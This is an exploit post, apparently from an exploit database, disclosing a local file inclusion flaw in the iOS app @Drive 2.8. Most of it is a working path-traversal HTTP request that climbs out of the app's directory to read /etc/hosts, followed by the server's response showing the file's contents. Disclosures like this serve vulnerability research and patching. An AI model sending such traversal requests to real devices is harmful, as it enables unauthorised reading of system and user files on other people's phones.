@Drive 2.8 Local File Inclusion

@Drive version 2.8 suffers from a local file inclusion vulnerability.


SHA-256 | 1c242342304c59d9a82db2eb45e80f971e783004a6b81e805655fb5adc09c690

# Exploit Title: @Drive 2.8  Local File inclusion
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://evolutive.co/
# Software Link: https://apps.apple.com/us/app/drive/id578982909
# Version: 2.8
# Tested on: iPhone ios 15.6

GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.187
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept: */*
Referer: http://192.168.1.187/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


--------

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 213
Accept-Ranges: bytes
Date: Thu, 08 Sep 2022 14:26:16 GMT

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost

Related Posts